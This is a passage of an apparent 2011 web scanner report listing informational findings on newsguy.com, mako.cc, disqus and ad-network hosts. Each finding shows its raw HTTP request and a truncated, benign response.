<HTML><BODY><img src="http://ads.adbrite.com/adserver/behavioral-data/8201?d=49,123" width="0" height="0" border="0"></img><script src="http://segment-pixel.invitemedia.com/pixel?partnerID=79&code=285
...[SNIP]...

30.57. http://mako.cc/projects/aub/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mako.cc
Path:   /projects/aub/

Request

GET /projects/aub/ HTTP/1.1
Host: mako.cc
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:49:39 GMT
Server: Apache/2.2.9 (Debian) DAV/2 PHP/4.4.4-8+etch6
Last-Modified: Sat, 09 May 2009 23:28:20 GMT
ETag: "64496-1a72-4698319b88d00"
Accept-Ranges: bytes
Content-Length: 6770
Content-Type: text/html

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xml:lang="en" lang="en">
<h
...[SNIP]...

30.58. http://mako.cc/projects/aub/docs/aub.1.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mako.cc
Path:   /projects/aub/docs/aub.1.html

Request

GET /projects/aub/docs/aub.1.html HTTP/1.1
Host: mako.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:35:36 GMT
Server: Apache/2.2.9 (Debian) DAV/2 PHP/4.4.4-8+etch6
Last-Modified: Sat, 09 May 2009 23:28:20 GMT
ETag: "64486-1372-4698319b88d00"
Accept-Ranges: bytes
Content-Length: 4978
Connection: close
Content-Type: text/html

<HTML
><HEAD
><TITLE
>aub</TITLE
><META
NAME="GENERATOR"
CONTENT="Modular DocBook HTML Stylesheet Version 1.76b+
"></HEAD
><BODY
CLASS="REFENTRY"
><H1
><A
NAME="AEN1">aub</H1
><DIV
CLASS="REFNAMEDIV"

...[SNIP]...

30.59. http://mako.cc/projects/aub/docs/aubconf.1.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mako.cc
Path:   /projects/aub/docs/aubconf.1.html

Request

GET /projects/aub/docs/aubconf.1.html HTTP/1.1
Host: mako.cc
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:35:40 GMT
Server: Apache/2.2.9 (Debian) DAV/2 PHP/4.4.4-8+etch6
Last-Modified: Sat, 09 May 2009 23:28:20 GMT
ETag: "64487-2dbc-4698319b88d00"
Accept-Ranges: bytes
Content-Length: 11708
Connection: close
Content-Type: text/html

<HTML
><HEAD
><TITLE
>aubconf</TITLE
><META
NAME="GENERATOR"
CONTENT="Modular DocBook HTML Stylesheet Version 1.76b+
"></HEAD
><BODY
CLASS="REFENTRY"
><H1
><A
NAME="AEN1">aubconf</H1
><DIV
CLASS="REFN
...[SNIP]...

30.60. http://media.fastclick.net/w/pg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/pg

Request

GET /w/pg?cont_id=11&d=f&no_cj_c=0&upsid=517004695355 HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/2010DM/1596198292@x23?USNetwork/Dominos_11Q1_DXU_Opt_120
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: pluto2=613465378701; zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; pluto=613465378701

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:49 GMT
Content-Type: text/html
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 929
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:35:49 GMT
Set-Cookie: pluto2=; domain=.fastclick.net; path=/; expires=Thu, 21-Dec-1972 00:00:00 GMT

<html><body><img alt="." src="https://r.openx.net/img?pixel_id=87f68fb6efd387eabfa1cbefde1f1914" />

<img src="https://ad.yieldmanager.com/pixel?id=938566&t=2" width="1" height="1" />

<!-- Google
...[SNIP]...

30.61. http://media.fastclick.net/w/win.bid

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /w/win.bid

Request

GET /w/win.bid?sid=54816&m=1&t=n&tp=5&d=f&mid=477674&EIC=1102509515205556&vch=554879014744&sys=3&evert=498003&vtid=14839&cb=1398482484&asite=2061501907&txid=9eb0b645-887a-48fe-96d9-a8ec0d65be5c&UD=CQAA7FD8nj1AEQAAAID1_gM-GQAAACBWDx8-KAAwAQ&wp=TT4pUwACvIcK5XsjKRZgBOX45riQQ1x_qFMGTg&walsh=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBhNNGUyk-TYf5CqP2lQeEwNnIAqmp2NwBybvEzxX5pf__EQAQARgBIAA4AVCAx-HEBGDJhqOH1KOAEIIBF2NhLXB1Yi0xMTg5MzcwNDA4OTk4NTU1oAGb5-foA7IBDmpvb21sYWNvZGUub3JnugEJNzI4eDkwX2FzyAEJ2gEyaHR0cDovL2pvb21sYWNvZGUub3JnL2dmL3Byb2plY3Qvam9vbWxhL3JlcG9ydGluZy-YAgrAAgTIAr23iA7gAgDqAhdKb29tbGFfSm9vbWxhY29kZUZvb3RlcqgDAegD8gPoA6gG6AM16AO5AugD2gX1AwAAAET1AwIAAADgBAE%26num%3D1%26sig%3DAGiWqtxXfy71xAYmo2tqD6PMiVjHwATbrg%26client%3Dca-pub-1189370408998555%26adurl%3D HTTP/1.1
Host: media.fastclick.net
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: zru=1|:1294800534|; lxc=AgAAAASMFi1NACAABHVydDE3IAfgBAADMwAAluAUHwEAAA==; lyc=BQAAAARmvzBNACAAARhFIASgAAaUMwAANhwpYBcBvUSgFCAABA49AAAZ4AoXQAABiw7gCS8ADSAvwAABaVrACSAAAksAAA==; pluto=517004695355|v1

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:37:24 GMT
Content-Type: text/html
P3P: CP='NOI DSP DEVo TAIo COR PSA OUR IND NAV'
Cache-Control: no-cache
Pragma: no-cache
Expires: 0
Content-Length: 883
Set-Cookie: pjw=BAEAAAACIAMDVCk+TSAGAQABIAMCuuoDYAcC6kkHIA1AEwEAAA==; domain=.fastclick.net; path=/; expires=Thu, 27-Jan-2011 01:37:24 GMT
Set-Cookie: vt=10070:256698:477674:54816:0:1295919444:3|; domain=.fastclick.net; path=/; expires=Thu, 24-Feb-2011 01:37:24 GMT
Set-Cookie: adv_ic=BwEAAABUKT5NIAYGAAFJAAAbWSAHIAsDAAAAAA==; domain=.fastclick.net; path=/; expires=Wed, 25-Jan-2012 01:37:24 GMT
Set-Cookie: pluto=517004695355|v1; domain=.fastclick.net; path=/; expires=Thu, 24-Jan-2013 01:37:24 GMT

<a href="http://media.fastclick.net/w/click.here?cid=256698&mid=477674&m=1&sid=54816&c=0&tp=5&exid=3&asite=2061501907&vtid=14839&walsh=http%3A%2F%2Fadclick.g.doubleclick.net%2Faclk%3Fsa%3Dl%26ai%3DBhN
...[SNIP]...

30.62. http://mediacdn.disqus.com/1295633860

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1295633860

Request

GET /1295633860 HTTP/1.1
Host: mediacdn.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __qca=P0-473502224-1295482487215;

Response

HTTP/1.0 404 Not Found
Server: nginx/0.5.30
Date: Mon, 24 Jan 2011 22:42:30 GMT
Content-Type: text/html
Content-Length: 529
X-Cache: MISS from chafe.disqus.net
X-Cache-Lookup: HIT from chafe.disqus.net:3128
X-Cache: MISS from cdce-nym011-015.nym011.internap.com
X-Cache: MISS from cdce-nym011-014.nym011.internap.com
Via: 1.1 chafe.disqus.net:3128 (squid), 1.0 cdce-nym011-015.nym011.internap.com:1081 (squid/2.7.STABLE7), 1.0 cdce-nym011-014.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: close

<html>
<head><title>404 Not Found</title></head>
<body bgcolor="white">
<center><h1>404 Not Found</h1></center>
<hr><center>nginx/0.5.30</center>
</body>
</html>
<!-- The padding to disable MSI
...[SNIP]...

30.63. http://mediacdn.disqus.com/1295633860/html/xdm.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mediacdn.disqus.com
Path:   /1295633860/html/xdm.html

Request

GET /1295633860/html/xdm.html HTTP/1.1
Host: mediacdn.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __qca=P0-473502224-1295482487215;

Response

HTTP/1.0 200 OK
Date: Sat, 22 Jan 2011 08:04:34 GMT
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Fri, 21 Jan 2011 18:30:10 GMT
Accept-Ranges: bytes
Content-Length: 2226
Cache-Control: max-age=2592000
Expires: Mon, 21 Feb 2011 08:04:34 GMT
Vary: Accept-Encoding
Content-Type: text/html
Age: 225475
X-Cache: HIT from media.disqus.com
X-Cache-Lookup: HIT from media.disqus.com:3128
X-Cache: MISS from cdce-nym011-010.nym011.internap.com
X-Cache: MISS from cdce-nym011-010.nym011.internap.com
Via: 1.1 media.disqus.com:3128 (squid), 1.0 cdce-nym011-010.nym011.internap.com:1082 (squid/2.7.STABLE7), 1.0 cdce-nym011-010.nym011.internap.com:80 (squid/2.7.STABLE7)
Connection: close

<!doctype html>
<html>
<head>
<title></title>
<meta http-equiv="CACHE-CONTROL" content="PUBLIC"/>
<meta http-equiv="EXPIRES" content="Sat, 01 Jan 2050 00:00:00 GMT"/>
<
...[SNIP]...

30.64. http://mig.nexac.com/2/B3DM/DLX/1@x96

Summary

Severity:   Information
Confidence:   Certain
Host:   http://mig.nexac.com
Path:   /2/B3DM/DLX/1@x96

Request

GET /2/B3DM/DLX/1@x96 HTTP/1.1
Host: mig.nexac.com
Proxy-Connection: keep-alive
Referer: http://dm.de.mookie1.com/2/B3DM/DLX/11596989115@x92?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: na_tc=Y

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 01:35:47 GMT
Server: Apache/2.0.52 (Red Hat)
Set-Cookie: OAX=rcHW800+KPMAAfCd; expires=Thu, 31-Dec-2020 23:59:59 GMT; path=/; domain=.nexac.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 1391
Content-Type: text/html
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660;path=/

<script>
function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e);
}

if((cookie_check(
...[SNIP]...

30.65. http://netwinsite.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://netwinsite.com
Path:   /

Request

GET / HTTP/1.1
Host: netwinsite.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:02 GMT
Server: Apache/1.3.37 (Unix) PHP/5.2.9 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635.SR1.2 mod_ssl/2.8.28 OpenSSL/0.9.7a
Connection: close
Content-Type: text/html
Content-Length: 22794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>

<title>Fast Reliable Mail Server, stops spam and viruses, easy
...[SNIP]...
</title>
<meta http-equiv="Content-Type" content="text/html;">
<META NAME="keywords" CONTENT="mail server, email server, windows mail server, mail server software, secure, antivirus, webmail, pop, pop3, imap, imap4, smtp, linux, mail-server, ssl, free mail server
...[SNIP]...

30.66. http://newsgrab.sourceforge.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsgrab.sourceforge.net
Path:   /

Request

GET / HTTP/1.1
Host: newsgrab.sourceforge.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.63
Date: Mon, 24 Jan 2011 22:43:22 GMT
Content-Type: text/html
Connection: close
Last-Modified: Tue, 12 Aug 2003 20:17:52 GMT
ETag: "23d-3c4b7ff55bc00"
Accept-Ranges: bytes
Content-Length: 573
Cache-Control: max-age=172800
Expires: Wed, 26 Jan 2011 22:43:22 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<META HTTP-EQUIV="Refresh" CONTENT="0; URL=http://sourceforge.net/projects/newsgrab/">

<TITLE>Newsgrab</TITLE>
</HEAD>
<BODY>
<B>Ohoy!
...[SNIP]...

30.67. http://newsguy.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsguy.com
Path:   /

Request

GET / HTTP/1.1
Host: newsguy.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:53:34 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=07e5e76216ca9266b6006a1955c20780; path=/
Content-Length: 35166
Cache-Control: private
Content-Type: text/html

<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>

<title>Welcome to Newsguy!</title>
<meta http-equiv="X-UA-Compatible" con
...[SNIP]...

30.68. http://newsguy.com/accountbandwidth.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsguy.com
Path:   /accountbandwidth.htm

Request

GET /accountbandwidth.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:33 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0d5dff58ea2b7fa79c6665d759e36567; path=/
Content-Length: 9155
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Individual Accounts - Usenet Account Features</title>

...[SNIP]...

30.69. http://newsguy.com/accountemail.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsguy.com
Path:   /accountemail.htm

Request

GET /accountemail.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:18 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0d68fde65b4ff929e7771e9183417ec0; path=/
Content-Length: 9269
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Individual Accounts - Usenet Account Features</title>

...[SNIP]...

30.70. http://newsguy.com/affiliate.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsguy.com
Path:   /affiliate.htm

Request

GET /affiliate.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:45:17 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=074008e54f0654946306e4e65907dd69; path=/
Content-Length: 27709
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Partner Program - Becoming a Newsguy Partner</title>
<
...[SNIP]...

30.71. http://newsguy.com/allinone.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsguy.com
Path:   /allinone.htm

Request

GET /allinone.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:42 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=03a6912f793bb952951adb8e1658ada2; path=/
Content-Length: 17579
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<meta http-equiv="Content-Language" content="en-us">

<title>Newsguy -
...[SNIP]...

30.72. http://newsguy.com/birthday.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsguy.com
Path:   /birthday.htm

Request

GET /birthday.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:36 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0ce021a7a64f02ac240a0a8d1e2acf76; path=/
Content-Length: 12307
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<meta http-equiv="Content-Language" content="en-us">

<title>Newsguy -
...[SNIP]...

30.73. http://newsguy.com/bonusbytes.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsguy.com
Path:   /bonusbytes.htm

Request

GET /bonusbytes.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:36 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=04c5bbd1a9491007cb5f91203243e58b; path=/
Content-Length: 15560
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<meta http-equiv="Content-Language" content="en-us">

<title>Newsguy -
...[SNIP]...

30.74. http://newsguy.com/cellphone.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsguy.com
Path:   /cellphone.htm

Request

GET /cellphone.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:45:11 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=023e3f49f2d18b856da6d8f94167d019; path=/
Content-Length: 12608
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<meta http-equiv="Content-Language" content="en-us">

<title>Newsguy - Newsgroups For Cellphones</title>
<meta NAME="description" CONTE
...[SNIP]...

30.75. http://newsguy.com/commd6.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsguy.com
Path:   /commd6.htm

Request

GET /commd6.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:53 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=06c5f7d82a3447eea4d6519eeca1bce1; path=/
Content-Length: 17446
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Web Hosting Services</title>
<meta NAME="description"
...[SNIP]...

30.76. http://newsguy.com/contact.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsguy.com
Path:   /contact.htm

Request

GET /contact.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:30 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0c8270d27d9d3631ff3ceea64605bb86; path=/
Content-Length: 9186
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - How to Contact Newsguy</title>
<meta NAME="description
...[SNIP]...

30.77. http://newsguy.com/copy.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsguy.com
Path:   /copy.htm

Request

GET /copy.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:45:26 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=059470dd7ea704c723c81ddbf036d4ba; path=/
Content-Length: 11876
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC
"-//W3C//DTD HTML 4.0 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd" >
<html>

<head>
<title>Newsguy - Copyright Notice</title>
<meta name="description" cont
...[SNIP]...

30.78. http://newsguy.com/diagnostics.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsguy.com
Path:   /diagnostics.htm

Request

GET /diagnostics.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:44:05 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0efe28b79fc3d01048db4a97c38af5ed; path=/
Content-Length: 8200
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>Newsguy - Testing Your Connection</title>
<meta name="description" content="Test your connection to Newsguy, a provider of Comme
...[SNIP]...

30.79. http://newsguy.com/email.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsguy.com
Path:   /email.htm

Request

GET /email.htm HTTP/1.1
Host: newsguy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: DIGEST=8tvYlg3bU.cESqZZU1EbqemKopp0oWW0L4d3d9256; session-id=07e5e76216ca9266b6006a1955c20780;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:43:39 GMT
Server: Apache/1.3.41 (Unix) mod_throttle/3.1.2 mod_perl/1.27 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7l-p1
Set-Cookie: session-id=0e5fcc0aee2c92abb216c13cc08d7e69; path=/
Content-Length: 9327
Cache-Control: private
Connection: close
Content-Type: text/html

...<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<html>

<head>
<title>Newsguy - Spam Free Email Accounts!</title>
<meta NAME="description" CONTENT="Unlimited Internet Access, Web Hosting, Usenet new
...[SNIP]...

30.80. http://newsguy.com/groups.htm

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsguy.com
